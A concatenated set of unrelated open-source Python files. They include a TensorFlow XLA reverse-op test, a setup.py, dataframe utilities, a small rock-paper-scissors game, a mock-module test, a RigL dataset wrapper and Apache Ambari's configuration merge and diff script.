<gh_stars>100-1000 # Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Functional tests for XLA Reverse Ops.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import itertools import numpy as np from tensorflow.compiler.tests import xla_test from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.ops import array_ops from tensorflow.python.platform import googletest class ReverseOpsTest(xla_test.XLATestCase): def testReverseOneDim(self): shape = (7, 5, 9, 11) for revdim in range(-len(shape), len(shape)): self._AssertReverseEqual([revdim], shape) def testReverseMoreThanOneDim(self): shape = (7, 5, 9, 11) # The offset is used to test various (but not all) combinations of negative # and positive axis indices that are guaranteed to not collide at the same # index. for revdims in itertools.chain.from_iterable( itertools.combinations(range(-offset, len(shape) - offset), k) for k in range(2, len(shape) + 1) for offset in range(0, len(shape))): self._AssertReverseEqual(revdims, shape) def _AssertReverseEqual(self, revdims, shape): np.random.seed(120) pval = np.random.randint(0, 100, size=shape).astype(float) with self.session(): with self.test_scope(): p = array_ops.placeholder(dtypes.int32, shape=shape) axis = constant_op.constant( np.array(revdims, dtype=np.int32), shape=(len(revdims),), dtype=dtypes.int32) rval = array_ops.reverse(p, axis).eval({p: pval}) slices = [ slice(-1, None, -1) if d in revdims or d - len(shape) in revdims else slice(None) for d in range(len(shape)) ] self.assertEqual(pval[slices].flatten().tolist(), rval.flatten().tolist()) if __name__ == '__main__': googletest.main()
setup.py
jameswilkerson/elex
183
12686591
<reponame>jameswilkerson/elex<filename>setup.py import os.path try: from setuptools import setup except ImportError: from distutils.core import setup def read(filename): return open(os.path.join(os.path.dirname(__file__), filename)).read() setup( name="elex", version="2.4.4", author="<NAME>, <NAME>", author_email="<EMAIL>, <EMAIL>", url="https://github.com/newsdev/elex", description="Client for parsing the Associated Press's elections API", long_description=read("README.rst"), packages=["elex", "elex.cli", "elex.api", "tests"], entry_points={"console_scripts": ("elex = elex.cli:main",)}, license="Apache License 2.0", keywords="election race candidate democracy news associated press", install_requires=[ "CacheControl==0.12.*", "cement==2.10.2", "lockfile==0.12.2", "pymongo==3.3", "python-dateutil==2.7.*", "requests==2.20.*", "ujson==1.35", ], classifiers=[ "Development Status :: 5 - Production/Stable", "Intended Audience :: Developers", "Topic :: Software Development :: Libraries :: Python Modules", "Programming Language :: Python", "Programming Language :: Python :: 2", "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.6", ], )
python/pygcylon/examples/util.py
deHasara/cylon
229
12686593
## # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ## ''' utils for examples ''' import cupy as cp import cudf def create_sorted_cudf_df(ncols, nrows, start=0, step=1): df_local = cudf.DataFrame() data_start = start for i in range(ncols): df_local["col-" + str(i)] = cp.arange(start=data_start, stop=data_start + nrows * step, step=step, dtype="int64") data_start += nrows * step return df_local def create_random_data_df(ncols, nrows, low=0, high=1000000000000): df_local = cudf.DataFrame() for i in range(ncols): df_local["col-" + str(i)] = cp.random.randint(low=low, high=high, size=nrows, dtype="int64") return df_local def random_data_df(nrows, col_lows=[0, 100], col_highs=[100, 200]): df_local = cudf.DataFrame() for i in range(len(col_lows)): df_local["col-" + str(i)] = cp.random.randint(low=col_lows[i], high=col_highs[i], size=nrows, dtype="int64") return df_local import string import random def random_str(size=6, chars=string.ascii_uppercase + string.digits): """ generate a random string with given size and char list source: https://stackoverflow.com/questions/2257441/random-string-generation-with-upper-case-letters-and-digits?rq=1 """ return ''.join(random.choice(chars) for _ in range(size)) def create_random_str_df(ncols, nrows, min_digits=2, max_digits=7): df_local = cudf.DataFrame() for i in range(ncols): df_local["col-" + str(i)] = [random_str(min_digits + i % (max_digits - min_digits)) for i in range(nrows)] return df_local def get_size(df_size_str): if df_size_str.endswith("MB"): df_size = df_size_str[:-2] df_size = int(df_size) * 1000000 return df_size elif df_size_str.endswith("GB"): df_size = df_size_str[:-2] df_size = int(df_size) * 1000000000 return df_size else: raise ValueError("Size has to be either MB or GB") def get_rows(df_size_str, ncols): df_size = get_size(df_size_str) # each element is int64, so 8 bytes return int(df_size / (ncols * 8))
CLUE_Rock_Paper_Scissors/very-simple/code.py
gamblor21/Adafruit_Learning_System_Guides
665
12686598
<reponame>gamblor21/Adafruit_Learning_System_Guides<gh_stars>100-1000 # clue-verysimple-rpsgame v1.0 # CircuitPython rock paper scissors game simple text game # based on https://www.youtube.com/watch?v=dhaaZQyBP2g # Tested with CLUE and Circuit Playground Bluefruit (Alpha) # and CircuitPython and 5.3.0 # copy this file to CLUE/CPB board as code.py # MIT License # Copyright (c) 2015 <NAME>, KidsCanCode LLC # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import random moves = ["r", "p", "s"] player_wins = ["pr", "sp", "rs"] print("Rock, paper scissors game: enter first letter for move or q for quit") while True: player_move = input("Your move: ") if player_move == "q": break computer_move = random.choice(moves) print("You:", player_move) print("Me:", computer_move) if player_move == computer_move: print("Tie") elif player_move + computer_move in player_wins: print("You win!") else: print("You lose!")
test/misc/mocktest.py
skysightsoaringweather/wrf-python
315
12686599
import sys import os try: from unittest.mock import MagicMock except ImportError: from mock import Mock as MagicMock class Mock(MagicMock): @classmethod def __getattr__(cls, name): return Mock() MOCK_MODULES = ["numpy", "numpy.ma", "xarray", "cartopy", "pandas", "matplotlib", "netCDF4", "mpl_toolkits.basemap", "wrf._wrffortran"] sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES) consts = {"DEFAULT_FILL": 9.9692099683868690E36, "DEFAULT_FILL_INT8": -127, "DEFAULT_FILL_INT16": -32767, "DEFAULT_FILL_INT32": -2147483647, "DEFAULT_FILL_INT64": -9223372036854775806, "DEFAULT_FILL_FLOAT": 9.9692099683868690E36, "DEFAULT_FILL_DOUBLE": 9.9692099683868690E36, "fomp_sched_static": 1, "fomp_sched_dynamic": 2, "fomp_sched_guided": 3, "fomp_sched_auto": 4} class MockWrfConstants(object): def __init__(self): self.__dict__ = consts def mock_asscalar(val): return float(val) sys.modules["wrf._wrffortran"].wrf_constants = MockWrfConstants() sys.modules["wrf._wrffortran"].omp_constants = MockWrfConstants() sys.modules["numpy"].asscalar = mock_asscalar try: import wrf except ImportError: pass print(wrf.get_coord_pairs.__doc__)
py/base/EretPreambleSequence.py
Wlgen/force-riscv
111
12686606
# # Copyright (C) [2020] Futurewei Technologies, Inc. # # FORCE-RISCV is licensed under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES # OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO # NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE. # See the License for the specific language governing permissions and # limitations under the License. # # classes, code related to Eret preamble sequence. from base.Sequence import Sequence # ------------------------------------------------------------------------------------------------------- # EretPreambleSequence to provide base class for eret preamble sequence. # ------------------------------------------------------------------------------------------------------- class EretPreambleSequence(Sequence): def __init__(self, gen_thread): super().__init__(gen_thread) def generate(self, **kargs): pass
rigl/experimental/jax/datasets/dataset_base.py
xhchrn/rigl
276
12686620
# coding=utf-8 # Copyright 2021 RigL Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """Dataset Classes. Dataset abstraction/factory to allow us to easily use tensorflow datasets (TFDS) with JAX/FLAX, by defining a bunch of wrappers, including preprocessing. """ import abc from typing import MutableMapping, Optional import tensorflow.compat.v2 as tf import tensorflow_datasets as tfds class Dataset(metaclass=abc.ABCMeta): """Base class for datasets. Attributes: DATAKEY: The key used for the data component of a Tensorflow Dataset (TFDS) sample, e.g. 'image' for image datasets. LABELKEY: The key used fot the label component of a Tensorflow Dataset sample, i.e. 'label'. name: The TFDS name of the dataset. batch_size: The batch size to use for the training dataset. batch_size_test: The batch size to use for the test dataset. num_classes: the number of supervised classes in the dataset. shape: the shape of an input data array. """ DATAKEY: Optional[str] = None LABELKEY: str = 'label' def __init__(self, name, batch_size, batch_size_test, shuffle_buffer_size, prefetch_size = 1, seed = None): """Base class for datasets. Args: name: The TFDS name of the dataset. batch_size: The batch size to use for the training dataset. batch_size_test: The batch size to use for the test dataset. shuffle_buffer_size: The buffer size to use for dataset shuffling. prefetch_size: The number of mini-batches to prefetch. seed: The random seed used to shuffle. Returns: A Dataset object. """ super().__init__() self.name = name self.batch_size = batch_size self.batch_size_test = batch_size_test self._shuffle_buffer_size = shuffle_buffer_size self._prefetch_size = prefetch_size self._train_ds, self._train_info = tfds.load( self.name, split=tfds.Split.TRAIN, data_dir=self._dataset_dir(), with_info=True) self._train_ds = self._train_ds.shuffle( self._shuffle_buffer_size, seed).map(self.preprocess).cache().map(self.augment).batch( self.batch_size, drop_remainder=True).prefetch(self._prefetch_size) self._test_ds, self._test_info = tfds.load( self.name, split=tfds.Split.TEST, data_dir=self._dataset_dir(), with_info=True) self._test_ds = self._test_ds.map(self.preprocess).cache().batch( self.batch_size_test).prefetch(self._prefetch_size) self.num_classes = self._train_info.features['label'].num_classes self.shape = self._train_info.features['image'].shape def _dataset_dir(self): """Returns the dataset path for the TFDS data.""" return None def get_train(self): """Returns the training dataset.""" return iter(tfds.as_numpy(self._train_ds)) def get_train_len(self): """Returns the length of the training dataset.""" return self._train_info.splits['train'].num_examples def get_test(self): """Returns the test dataset.""" return iter(tfds.as_numpy(self._test_ds)) def get_test_len(self): """Returns the length of the test dataset.""" return self._test_info.splits['test'].num_examples def preprocess( self, data): """Preprocessing fn used by TFDS map for normalization. This function is for transformations that can be cached, e.g. normalization/whitening. Args: data: Data sample. Returns: Data after being normalized/transformed. """ return data def augment( self, data): """Preprocessing fn used by TFDS map for augmentation at training time. This function is for transformations that should not be cached, e.g. random augmentation that should change for every sample, and are only applied at training time. Args: data: Data sample. Returns: Data after being augmented/transformed. """ return data class ImageDataset(Dataset): """Base class for image datasets.""" DATAKEY = 'image' def preprocess( self, data): """Preprocessing function used by TFDS map for normalization. This function is for transformations that can be cached, e.g. normalization/whitening. Args: data: Data sample. Returns: Data after being normalized/transformed. """ data = super().preprocess(data) # Ensure we only provide the image and label, stripping out other keys. return dict((key, val) for key, val in data.items() if key in [self.LABELKEY, self.DATAKEY])
ambari-server/src/main/resources/scripts/takeover_config_merge.py
likenamehaojie/Apache-Ambari-ZH
1,664
12686626
<filename>ambari-server/src/main/resources/scripts/takeover_config_merge.py #!/usr/bin/env python ''' Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ''' import optparse import sys import os import logging import tempfile import json import re import base64 import time import xml import xml.etree.ElementTree as ET import StringIO import ConfigParser from optparse import OptionGroup logger = logging.getLogger('AmbariTakeoverConfigMerge') CONFIG_MAPPING_HELP_TEXT = """ JSON file should content map with {regex_path : <service>-log4j} Example: {".+/hadoop/.+/log4j.properties" : "hdfs-log4j", ".+/etc/zookeeper/conf/log4j.properties" : "zookeeper-log4j" "c6401.ambari.apache.org/etc/hive/conf/log4j.properties" : "hive-log4j"} """ LICENSE = """ # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """ class Parser: pass class ShParser(Parser): def read_data_to_map(self, path): with open(path, 'r') as file: file_content = file.read() return {"content" : file_content}, None class YamlParser(Parser): # Used Yaml parser to read data into a map def read_data_to_map(self, path): try: import yaml except ImportError: logger.error("Module PyYAML not installed. Please try to execute \"pip install pyyaml\" for installing PyYAML module.") sys.exit(1) configurations = {} with open(path, 'r') as file: try: for name, value in yaml.load(file).iteritems(): if name != None: configurations[name] = str(value) except: logger.error("Couldn't parse {0} file. Skipping ...".format(path)) return None, None return configurations, None class PropertiesParser(Parser): # Used ConfigParser parser to read data into a map def read_data_to_map(self, path): configurations = {} try : #Adding dummy section to properties file content for use ConfigParser properties_file_content = StringIO.StringIO() properties_file_content.write('[dummysection]\n') properties_file_content.write(open(path).read()) properties_file_content.seek(0, os.SEEK_SET) cp = ConfigParser.ConfigParser() cp.optionxform = str cp.readfp(properties_file_content) for section in cp._sections: for name, value in cp._sections[section].iteritems(): if name != None: configurations[name] = value del configurations['__name__'] except: logger.exception("ConfigParser error: ") return configurations, None class XmlParser(Parser): # Used DOM parser to read data into a map def read_data_to_map(self, path): configurations = {} properties_attributes = {} tree = ET.parse(path) root = tree.getroot() for properties in root.getiterator('property'): name = properties.find('name') value = properties.find('value') #TODO support all properties attributes final = properties.find('final') if name != None: name_text = name.text if name.text else "" else: logger.warn("No name is found for one of the properties in {0}, ignoring it".format(path)) continue if value != None: value_text = value.text if value.text else "" else: logger.warn("No value is found for \"{0}\" in {1}, using empty string for it".format(name_text, path)) value_text = "" if final != None: final_text = final.text if final.text else "" properties_attributes[name_text] = final_text configurations[name_text] = value_text logger.debug("Following configurations found in {0}:\n{1}".format(path, configurations)) return configurations, properties_attributes class ConfigMerge: CONTENT_UNKNOWN_FILES_MAPPING_FILE = {} LEFT_INPUT_DIR = "/tmp/left" RIGHT_INPUT_DIR = "/tmp/right" INPUT_DIR = '/etc/hadoop' OUTPUT_DIR = '/tmp' OUT_FILENAME = 'ambari_takeover_config_merge.out' JSON_FILENAME = 'ambari_takeover_config_merge.json' PARSER_BY_EXTENSIONS = {'.xml' : XmlParser(), '.yaml' : YamlParser(), '.properties' : PropertiesParser(), '.sh' : ShParser()} SUPPORTED_EXTENSIONS = ['.xml', '.yaml', '.properties', '.sh'] SUPPORTED_FILENAME_ENDINGS = {".sh" : "-env"} UNKNOWN_FILES_MAPPING_FILE = None CONFIGS_WITH_CONTENT = ['pig-properties', '-log4j'] NOT_MAPPED_FILES = ['log4j.properties'] config_files_map = {} left_file_paths = None right_file_paths = None def __init__(self, config_files_map=None, left_file_paths=None, right_file_paths=None): self.config_files_map = config_files_map self.left_file_paths = left_file_paths self.right_file_paths = right_file_paths @staticmethod def get_all_supported_files_grouped_by_name(extensions=SUPPORTED_EXTENSIONS, directory=INPUT_DIR): filePaths = {} for dirName, subdirList, fileList in os.walk(directory, followlinks=True): for file in fileList: root, ext = os.path.splitext(file) if ext in extensions: file_path = os.path.join(dirName, file) if ext in ConfigMerge.SUPPORTED_FILENAME_ENDINGS and not ConfigMerge.SUPPORTED_FILENAME_ENDINGS[ext] in root: logger.warn("File {0} is not configurable by Ambari. Skipping...".format(file_path)) continue config_name = None if ConfigMerge.UNKNOWN_FILES_MAPPING_FILE: for path_regex, name in ConfigMerge.CONTENT_UNKNOWN_FILES_MAPPING_FILE.iteritems(): match = re.match(path_regex, os.path.relpath(file_path, ConfigMerge.INPUT_DIR)) if match: config_name = name break if not config_name: if file in ConfigMerge.NOT_MAPPED_FILES: if ConfigMerge.UNKNOWN_FILES_MAPPING_FILE: logger.error("File {0} doesn't match any regex from {1}".format(file_path, ConfigMerge.UNKNOWN_FILES_MAPPING_FILE)) else: logger.error("Cannot map {0} to Ambari config type. Please use -u option to specify config mapping for this file. \n" "For more information use --help option for script".format(file_path)) continue else: config_name = file if not config_name in filePaths: filePaths[config_name] = [] filePaths[config_name].append((file_path, ConfigMerge.PARSER_BY_EXTENSIONS[ext])) return filePaths @staticmethod def merge_configurations(filepath_to_configurations): configuration_information_dict = {} property_name_to_value_to_filepaths = {} merged_configurations = {} for path, configurations in filepath_to_configurations.iteritems(): for configuration_name, value in configurations.iteritems(): if not configuration_name in property_name_to_value_to_filepaths: property_name_to_value_to_filepaths[configuration_name] = {} if not value in property_name_to_value_to_filepaths[configuration_name]: property_name_to_value_to_filepaths[configuration_name][value] = [] logger.debug("Iterating over '{0}' with value '{1}' in file '{2}'".format(configuration_name, value, path)) property_name_to_value_to_filepaths[configuration_name][value].append(path) merged_configurations[configuration_name] = value return merged_configurations, property_name_to_value_to_filepaths @staticmethod def format_for_blueprint(configurations, attributes): all_configs = [] for configuration_type, configuration_properties in configurations.iteritems(): is_content = False all_configs.append({}) for config_with_content in ConfigMerge.CONFIGS_WITH_CONTENT: if config_with_content in configuration_type: is_content = True break if is_content: content = LICENSE for property_name, property_value in configuration_properties.iteritems(): content+=property_name + "=" + property_value + "\n" all_configs[-1][configuration_type] = {'properties': {"content" : content}} else: all_configs[-1][configuration_type] = {'properties' :configuration_properties} for configuration_type_attributes, properties_attributes in attributes.iteritems(): if properties_attributes and configuration_type == configuration_type_attributes: all_configs[-1][configuration_type].update({"properties_attributes" : {"final" : properties_attributes}}) return { "configurations": all_configs, "host_groups": [], "Blueprints": {} } @staticmethod def format_conflicts_output(property_name_to_value_to_filepaths): output = "" for property_name, value_to_filepaths in property_name_to_value_to_filepaths.iteritems(): if len(value_to_filepaths) == 1: continue first_item = False for value, filepaths in value_to_filepaths.iteritems(): if not first_item: first_item = True output += "\n\n=== {0} | {1} | {2} |\nHas conflicts with:\n\n".format(property_name,filepaths[0], value) continue for filepath in filepaths: output += "| {0} | {1} | {2} |\n".format(property_name, filepath, value) return output def perform_merge(self): result_configurations = {} result_property_attributes = {} has_conflicts = False for filename, paths_and_parsers in self.config_files_map.iteritems(): filepath_to_configurations = {} filepath_to_property_attributes = {} configuration_type = os.path.splitext(filename)[0] for path_and_parser in paths_and_parsers: path, parser = path_and_parser logger.debug("Read data from {0}".format(path)) parsed_configurations_from_path, parsed_properties_attributes = parser.read_data_to_map(path) if parsed_configurations_from_path != None: filepath_to_configurations[path] = parsed_configurations_from_path if parsed_properties_attributes != None: filepath_to_property_attributes[path] = parsed_properties_attributes #configs merge merged_configurations, property_name_to_value_to_filepaths = ConfigMerge.merge_configurations( filepath_to_configurations) #properties attributes merge merged_attributes, property_name_to_attribute_to_filepaths = ConfigMerge.merge_configurations( filepath_to_property_attributes) configuration_conflicts_output = ConfigMerge.format_conflicts_output(property_name_to_value_to_filepaths) attribute_conflicts_output = ConfigMerge.format_conflicts_output(property_name_to_attribute_to_filepaths) if configuration_conflicts_output: has_conflicts = True conflict_filename = os.path.join(self.OUTPUT_DIR, configuration_type + "-conflicts.txt") logger.warn( "You have configurations conflicts for {0}. Please check {1}".format(configuration_type, conflict_filename)) with open(conflict_filename, "w") as fp: fp.write(configuration_conflicts_output) if attribute_conflicts_output: has_conflicts = True conflict_filename = os.path.join(self.OUTPUT_DIR, configuration_type + "-attributes-conflicts.txt") logger.warn( "You have property attribute conflicts for {0}. Please check {1}".format(configuration_type, conflict_filename)) with open(conflict_filename, "w") as fp: fp.write(attribute_conflicts_output) result_configurations[configuration_type] = merged_configurations result_property_attributes[configuration_type] = merged_attributes result_json_file = os.path.join(self.OUTPUT_DIR, "blueprint.json") logger.info("Using '{0}' file as output for blueprint template".format(result_json_file)) with open(result_json_file, 'w') as outfile: outfile.write(json.dumps(ConfigMerge.format_for_blueprint(result_configurations, result_property_attributes), sort_keys=True, indent=4, separators=(',', ': '))) if has_conflicts: logger.info("Script finished with configurations conflicts, please resolve them before using the blueprint") return 1 else: logger.info("Script successfully finished") return 0 def perform_diff(self): configurations_conflicts = {} attributes_conflicts = {} file_conflicts = [] matches_configs = [] for right_configs_names in self.right_file_paths: for left_configs_names in self.left_file_paths: if right_configs_names == left_configs_names: matches_configs.append(right_configs_names) for match_config in matches_configs: configurations_conflicts[match_config], attributes_conflicts[match_config] = ConfigMerge.configuration_diff(self.left_file_paths[match_config], self.right_file_paths[match_config]) file_conflicts = ConfigMerge.get_missing_files(self.right_file_paths, matches_configs, ConfigMerge.LEFT_INPUT_DIR) + \ ConfigMerge.get_missing_files(self.left_file_paths, matches_configs, ConfigMerge.RIGHT_INPUT_DIR) configuration_diff_output = None configuration_diff_output = ConfigMerge.format_diff_output(file_conflicts, configurations_conflicts, attributes_conflicts) if configuration_diff_output and configuration_diff_output != "": conflict_filename = os.path.join(ConfigMerge.OUTPUT_DIR, "file-diff.txt") logger.warn( "You have file diff conflicts. Please check {0}".format(conflict_filename)) with open(conflict_filename, "w") as fp: fp.write(configuration_diff_output) logger.info("Script successfully finished") return 0 @staticmethod def format_diff_output(file_conflicts, configurations_conflicts, attributes_conflicts): output = "" if file_conflicts: output += "======= File diff conflicts ====== \n\n" for file_conflict in file_conflicts: output+=str(file_conflict)+"\n" if configurations_conflicts: output += "\n\n======= Property diff conflicts ====== " for config_name, property in configurations_conflicts.iteritems(): if property: output+= "\n\n||| " + config_name + " |||\n" output+= "\n".join(str(p) for p in property) if attributes_conflicts: output += "\n\n======= Final attribute diff conflicts ====== " for config_name, property_with_attribute in attributes_conflicts.iteritems(): if property_with_attribute: output+= "\n\n||| " + config_name + " |||\n" output+= "\n".join(str(p) for p in property_with_attribute) return output @staticmethod def configuration_diff(left, right): properties_conflicts = [] attributes_conflicts = [] left_path, left_parser = left[0] left_configurations, left_attributes = left_parser.read_data_to_map(left_path) right_path, right_parser = right[0] right_configurations, right_attributes = right_parser.read_data_to_map(right_path) matches_configs = [] matches_attributes = [] matches_configs, properties_conflicts = ConfigMerge.get_conflicts_and_matches(left_configurations, right_configurations, left_path, right_path) properties_conflicts += ConfigMerge.get_missing_properties(left_configurations, matches_configs, right_path) + \ ConfigMerge.get_missing_properties(right_configurations, matches_configs, left_path) if left_attributes and right_attributes: matches_attributes, attributes_conflicts = ConfigMerge.get_conflicts_and_matches(left_attributes, right_attributes, left_path, right_path) attributes_conflicts += ConfigMerge.get_missing_attributes(left_attributes, matches_attributes, right_path) + \ ConfigMerge.get_missing_attributes(right_attributes, matches_attributes, left_path) elif left_attributes: attributes_conflicts = ConfigMerge.get_missing_attributes(left_attributes, matches_attributes, right_path) elif right_attributes: attributes_conflicts = ConfigMerge.get_missing_attributes(right_attributes, matches_attributes, left_path) return properties_conflicts, attributes_conflicts @staticmethod def get_conflicts_and_matches(left_items, right_items, left_path, right_path): matches = [] conflicts = [] for left_key, left_value in left_items.iteritems(): for right_key, right_value in right_items.iteritems(): if left_key == right_key: matches.append(right_key) if left_value != right_value: conflicts.append({right_key : [{left_path : left_value}, {right_path :right_value}]}) return matches, conflicts @staticmethod def get_missing_attributes(attributes, matches, file_path): conflicts = [] for key, value in attributes.iteritems(): if not key in matches: conflicts.append({key : "Final attribute is missing in {0} file".format(file_path)}) return conflicts @staticmethod def get_missing_properties(configurations, matches, file_path): conflicts = [] for key, value in configurations.iteritems(): if not key in matches: conflicts.append({key : "Property is missing in {0} file".format(file_path)}) return conflicts @staticmethod def get_missing_files(config_file_paths, matches, input_dir): conflicts = [] for file_name in config_file_paths: if file_name not in matches: conflicts.append({file_name : "Configurations file is missing for {0} directory".format(input_dir)}) return conflicts def main(): tempDir = tempfile.gettempdir() outputDir = os.path.join(tempDir) parser = optparse.OptionParser(usage="usage: %prog [options]") parser.set_description('This python program is an Ambari thin client and ' 'supports Ambari cluster takeover by generating a ' 'configuration json that can be used with a ' 'blueprint.\n\nIt reads actual hadoop configs ' 'from a target directory and produces an out file ' 'with problems found that need to be addressed and ' 'the json file which can be used to create the ' 'blueprint.\n\nThis script only works with *.xml *.yaml ' 'and *.properties extensions of files.') parser.add_option("-a", "--action", dest="action", default = "merge", help="Script action. (merge/diff) [default: merge]") parser.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="output verbosity.") parser.add_option("-o", "--outputdir", dest="outputDir", default=outputDir, metavar="FILE", help="Output directory. [default: /tmp]") parser.add_option("-u", '--unknown-files-mapping-file',dest="unknown_files_mapping_file", metavar="FILE", help=CONFIG_MAPPING_HELP_TEXT, default="takeover_files_mapping.json") merge_options_group = OptionGroup(parser, "Required options for action 'merge'") merge_options_group.add_option("-i", "--inputdir", dest="inputDir", help="Input directory.") parser.add_option_group(merge_options_group) diff_options_group = OptionGroup(parser, "Required options for action 'diff'") diff_options_group.add_option("-l", "--leftInputDir", dest="leftInputDir", help="Left input directory.") diff_options_group.add_option("-r", "--rightInputDir", dest="rightInputDir", help="Right input directory.") parser.add_option_group(diff_options_group) (options, args) = parser.parse_args() # set verbose if options.verbose: logger.setLevel(logging.DEBUG) else: logger.setLevel(logging.INFO) ConfigMerge.OUTPUT_DIR = options.outputDir if not os.path.exists(ConfigMerge.OUTPUT_DIR): os.makedirs(ConfigMerge.OUTPUT_DIR) logegr_file_name = os.path.join(ConfigMerge.OUTPUT_DIR, "takeover_config_merge.log") file_handler = logging.FileHandler(logegr_file_name, mode="w") formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s') file_handler.setFormatter(formatter) logger.addHandler(file_handler) stdout_handler = logging.StreamHandler(sys.stdout) stdout_handler.setLevel(logging.INFO) stdout_handler.setFormatter(formatter) logger.addHandler(stdout_handler) #unknown file mapping if options.unknown_files_mapping_file and os.path.exists(options.unknown_files_mapping_file): ConfigMerge.UNKNOWN_FILES_MAPPING_FILE = options.unknown_files_mapping_file with open(options.unknown_files_mapping_file) as f: ConfigMerge.CONTENT_UNKNOWN_FILES_MAPPING_FILE = json.load(f) else: logger.warning("Config mapping file was not found at {0}. " "Please provide it at the given path or provide a different path to it using -u option.".format(options.unknown_files_mapping_file)) if options.action == "merge" : ConfigMerge.INPUT_DIR = options.inputDir file_paths = ConfigMerge.get_all_supported_files_grouped_by_name(directory=ConfigMerge.INPUT_DIR) logger.info("Writing logs into '{0}' file".format(logegr_file_name)) logger.debug("Following configuration files found:\n{0}".format(file_paths.items())) config_merge = ConfigMerge(config_files_map=file_paths) return config_merge.perform_merge() elif options.action == "diff" : if options.leftInputDir and os.path.isdir(options.leftInputDir): ConfigMerge.LEFT_INPUT_DIR = options.leftInputDir else: logger.error("Directory \"{0}\" doesn't exist. Use option \"-h\" for details".format(options.leftInputDir)) return -1 if options.rightInputDir and os.path.isdir(options.rightInputDir): ConfigMerge.RIGHT_INPUT_DIR = options.rightInputDir else: logger.error("Directory \"{0}\" doesn't exist. Use option \"-h\" for details".format(options.rightInputDir)) return -1 logger.info("Writing logs into '{0}' file".format(logegr_file_name)) left_file_paths = ConfigMerge.get_all_supported_files_grouped_by_name(directory=ConfigMerge.LEFT_INPUT_DIR) logger.debug("Following configuration files found:\n{0} for left directory".format(left_file_paths.items())) right_file_paths = ConfigMerge.get_all_supported_files_grouped_by_name(directory=ConfigMerge.RIGHT_INPUT_DIR) logger.debug("Following configuration files found:\n{0} for right directory".format(right_file_paths.items())) config_merge = ConfigMerge(left_file_paths=left_file_paths , right_file_paths=right_file_paths) return config_merge.perform_diff() else: logger.error("Action \"{0}\" doesn't supports by script. Use option \"-h\" for details".format(options.action)) return -1 if __name__ == "__main__": try: sys.exit(main()) except (KeyboardInterrupt, EOFError): print("\nAborting ... Keyboard Interrupt.") sys.exit(1)
samples/payment/all.py
Hey-Marvelous/PayPal-Python-SDK
653
12686633
